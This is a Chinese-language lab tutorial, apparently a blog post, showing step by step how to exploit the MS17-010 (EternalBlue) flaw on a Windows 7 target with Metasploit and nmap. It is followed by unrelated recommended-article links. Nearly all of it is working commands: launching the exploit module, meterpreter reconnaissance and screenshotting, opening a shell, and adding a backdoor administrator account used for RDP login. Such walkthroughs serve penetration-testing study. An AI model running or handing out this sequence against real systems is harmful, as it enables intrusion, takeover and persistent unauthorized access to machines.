目录

1.启动msf

2.检查msf库里是否存在ms17-010漏洞

3.扫描靶机开放端口

4.配置目标ip,本地ip并利用exploit进行攻击

5.查看靶机系统信息、用户身份并对远程主机当前屏幕截图

6.获得shell控制台进cmd操作,添加账户提升权限

7.远程登录靶机

8.输入添加的账户密码,登录成功

环境:

攻击机:kali  192.168.10.2           靶机:win7  192.168.10.3

1.启动msf

# msfconsole

2.检查msf库里是否存在ms17-010漏洞

msf6 > search ms17

3.扫描靶机开放端口

# nmap -sV 192.168.10.3

4.配置目标ip,本地ip并利用exploit进行攻击

msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.10.3
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.10.2
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

5.查看靶机系统信息、用户身份并对远程主机当前屏幕截图

meterpreter > sysinfo
meterpreter > getuid
meterpreter > screenshot

6.获得shell控制台进cmd操作,添加账户提升权限

meterpreter > shell
C:\Windows\system32>net user lql 123456 /add
C:\Windows\system32>net localgroup Administrators lql /add

7.远程登录靶机

# rdesktop 192.168.10.3:3389

8.输入添加的账户密码,登录成功

永恒之蓝(ms17010)漏洞利用相关推荐

  1. 永恒之蓝ms17-010漏洞利用复现

    一.永恒之蓝简述: 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含"永恒之蓝"工具,"永恒之蓝&q ...

  2. 永恒之蓝MS17-010漏洞利用 writeup

    MS17-010漏洞: MS17-010漏洞: • 一. MS17-010漏洞公告及相关分析报告 •二.漏洞重现 •漏洞利用防范 • 一. MS17-010漏洞公告及相关分析报告 ★MS17_010 ...

  3. MS17-010(Eternal blue永恒之蓝)漏洞利用+修复方法

    MS17-010(Eternal blue永恒之蓝)漏洞利用+修复方法 前言 0x01 准备工作 0x02 漏洞利用 0x03 修复方案 总结 前言 提到操作系统漏洞,大家肯定听说过耳熟能详的永恒之蓝 ...

  4. 永恒之蓝 MS17-010漏洞复现

    永恒之蓝 MS17-010漏洞复现 文章目录 永恒之蓝 MS17-010漏洞复现 一:漏洞原理 1:简介 2:漏洞原理代码详解 二:漏洞复现 1:信息收集 2:尝试攻击 1>:查看漏洞模块--s ...

  5. metasploit实战-ms17-010(永恒之蓝)漏洞利用与复现

    本文目录 永恒之蓝概述 实验环境 实验过程 第一步:扫描漏洞 第二步:渗透攻击 第三步:漏洞利用 截屏 永恒之蓝概述 ms17-010(永恒之蓝)漏洞是由Shadow Brokers(影子经纪人)在2 ...

  6. ms17-010(永恒之蓝)漏洞利用

    kali利用ms17-010获取win7权限 环境介绍 利用过程 总结 环境介绍 攻击机:kali(ip:192.168.133.136) 靶机:win7(ip:192.168.133.138) 靶机 ...

  7. 永恒之蓝ms17_010漏洞利用攻击

    文章目录 前言 一:基础知识介绍 二.实验环境 三.实验步骤 总结 前言 学习Metasploit的时候就听说了经典的永恒之蓝漏洞,所以自己试验了一次,借此作个记录. 一:基础知识介绍 1.何为永恒之 ...

  8. 永恒之蓝(MS17-010)漏洞复现及msf常用渗透命令

    环境部署 靶机:win7(172.168.100.158) 工具机:kali,nessus 攻击步骤 1.nessus扫描靶机 2.根据扫描结果查看靶机漏洞 3.发现靶机存在永恒之蓝(MS17-010 ...

  9. Linux(kali)永恒之蓝(ms17-010)漏洞实验

    0.准备实验机 一台kali的,一台windows. windows这台有永恒之蓝漏洞即可,2003,2008都可以. 我是用的cn_win_srv_2003_r2_enterprise_with_s ...

  10. 永恒之蓝(EternalBlue)漏洞利用实例

    1.升级kali-rolling a.修改更新源 vim /etc/apt/sources.list,只保留官方更新源"deb http://http.kali.org/kali kali- ...

最新文章

  1. springboot第十讲
  2. 在 Java 的反射中,Class.forName 和 ClassLoader 的区别
  3. 测试Mybatis时事务自动回滚,无法完成增删改
  4. Java链表—— LinkedList
  5. rust(72)-match匹配
  6. EMNLP 2021 | ST-ToD:小样本场景下的任务型对话预训练
  7. Equipment upload - ERP inbound的debug
  8. 原 IOS之NSValue整理
  9. Mars 算法实践——人脸识别 1
  10. 【英语学习】【WOTD】adversary 释义/词源/示例
  11. 老板分分钟要急需应急海报怎么做?PSD分层万能模板帮你解决燃眉之急!
  12. 如何减小电压跟随器输出电阻_气动操作器FBD5061SF-1蓝宇品牌安徽
  13. php 过滤入库不可见字符,php如何过滤不可见字符
  14. Luogu1156 垃圾陷阱
  15. 安卓手机小说阅读器_粉笔免费小说阅读器app下载-粉笔免费小说阅读器APP手机版v1.0.1...
  16. WebService原理浅析
  17. html图片右边加竖线,插入Html竖线代码
  18. Java job interview:Java对象持久化的新的规范JDO
  19. 主流操作系统的开发语言
  20. 基于区块链的知识共享框架-Aletheia

热门文章

  1. 冰点还原离线激活_冰点还原密钥,详细教您如何激活冰点还原
  2. 什么是AppFuse
  3. windows下安装MinGW及C++的环境配置
  4. vbs整人代码大集合 多年的代码收集
  5. 机械制图之零件图表达
  6. 利用vbs脚本实现自动发送微信消息
  7. 小程序源码:王者荣耀战力查询微信小程序源码下载支持安卓苹果微信QQ等多区查询
  8. 【业务】JS中的有序Map与无序Object
  9. 对抗神经网络 (GAN) 的深入了解
  10. CFGAN--基于生成对抗神经网络的协同过滤推荐